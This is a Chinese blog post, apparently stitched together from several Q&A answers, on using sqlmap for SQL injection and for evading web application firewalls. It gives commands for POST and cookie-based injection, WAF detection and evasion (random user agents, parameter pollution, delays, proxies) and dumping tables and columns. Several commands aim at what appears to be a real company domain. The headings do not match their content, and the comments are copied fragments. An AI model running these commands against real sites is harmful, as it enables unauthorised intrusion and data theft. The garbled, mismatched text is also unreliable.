×

sqlmap绕过防火墙注入实战

sqlmap绕过防火墙注入实战(sqlmap注入失败)

hacker hacker 发表于2022-06-04 00:41:38 浏览41 评论5

5人参与发表评论

本文导读目录:
1、怎么用sqlmap测试登录注入
2、为什么sql注释符能绕过waf
3、利用sqlmap注入时,发现站点对空格进行了过滤,可以使用什么脚本来绕过
4、需要登录的网页 sqlmap怎么注入
5、怎么加固php网站防止sqlmap
6、如何使用SQLMap绕过WAF
7、如何使用sqlmap扫描sql注入漏洞
8、如何使用sqlmap进行sql注入

怎么用sqlmap测试登录注入

严谨一点问题应该是:怎么用sqlmap测试Post注入,方法为:

第一种方式:./sqlmap.py -r post.txt(储存post数据的文本) -p 要注入的参数

第二种方式:sqlmap -u "url" --forms

第三种方式:sqlmap -u "url" --data "指定的参数"(如txt_UserName=aaatxt_Pwd=aaaa)

为什么sql注释符能绕过waf

如何使用SQLMap绕过WAF POST注入 有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。

利用sqlmap注入时,发现站点对空格进行了过滤,可以使用什么脚本来绕过

0x00 前言

现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过,请仔细查看输出的信息。

0x01 确认WAF

首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我们可以利用这些来判断。在此我们,也介绍使用sqlmap 进行检测是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --thread 10 --identify-waf#首选

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --thread 10 --check-waf#备选

0x02 使用参数进行绕过

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入

需要登录的网页 sqlmap怎么注入

·对于需要登录的网站,我们需要指定其cookie 。我们可以用账号密码登录,然后用抓包工具抓取其cookie填入。

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞

·对于是post提交数据的URL,我们需要指定其data参数

sqlmap -u "http://192.168.10.1/sqli/Less-11/" --data="uname=adminpasswd=adminsubmit=Submit" #抓取其post提交的数据填入

我们也可以通过抓取 http 数据包保存为文件,然后指定该文件即可。这样,我们就可以不用指定其他参数,这对于需要登录的网站或者post提交数据的网站很方便。

我们抓取了一个post提交数据的数据包保存为post.txt,如下,uname参数和passwd参数存在SQL注入漏洞

怎么加固php网站防止sqlmap

WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs。

如何使用SQLMap绕过WAF

 POST注入 有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。 查看payload 之前一直是加本地代理,然后用burpsuit来看sqlmap的payload,到现在才发现用-v参数就可以实现。一直认为-v实现的只是控制警告,debug信息级别。实际上使用-v 3就可以显示注入的payload,4,5,6还可以显示HTTP请求,HTTP响应头和页面。 使用google搜索 sqlmap可以测试google搜索结果中的sql注入,很强大的功能吧。使用方法是参数-g。不过感觉实际使用中这个用的还是很少的。 请求延时 在注入过程中请求太频繁的话可能会被防火墙拦截,这时候--delay参数就起作用了。可以设定两...

如何使用sqlmap扫描sql注入漏洞

先准备好MS SQLServer和MySQL的jdbc驱动。 在Oracle SQLDeveloper引入驱动: 工具--首选项--数据库--第三方jdbc驱动程序 最后在新建链接时,就可以看到sqlserver和mysql的标签了。

如何使用sqlmap进行sql注入

输入命令sqlmap -u + “风险网址” 检测是否存在sql注入漏洞。

看到返回了 服务器的类型,web环境,数据库类型。确定存在漏洞我们开始下一步的注入。根据返回的数据库类型我们确定数据库为access数据库。使用--tables 猜解表。

猜解完表格后我们进一步猜解表的内容。

命令 : python sqlmap.py -u URL -T admin --columns

注意 暴力破解的线程数 最大为10 ,其他的参数可以直接回车。

猜解完表的内容我们可以直接猜解表列的内容。

5

等待一段时间后,程序工作完毕,查看结果。

群贤毕至

访客
舔夺锦欢 舔夺锦欢2022-06-04 02:12:50 | 回复 post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。 查看payload 之前一直是加本地代理,然后用bu
可难望笑 可难望笑2022-06-04 04:37:52 | 回复 le搜索结果中的sql注入,很强大的功能吧。使用方法是参数-g。不过感觉实际使用中这个用的还是很少的。 请求延时 在注入过程中请求太频繁的话可能会被防火墙拦截,这时候--delay参数就起作用了。可以设定两...如何使用sqlmap扫描sq
假欢掩吻 假欢掩吻2022-06-04 06:47:53 | 回复 POST注入 有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读
边侣庸颜 边侣庸颜2022-06-04 04:10:18 | 回复 表。猜解完表格后我们进一步猜解表的内容。命令 : python sqlmap.py -u URL -T admin --columns 注意 暴力破解的线程数 最大为10 ,其他的参数可以直接回车。猜解完表的内容我们可以直接猜解
嘻友瘾然 嘻友瘾然2022-06-04 03:12:29 | 回复 --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51types=4" --proxy=211.211.2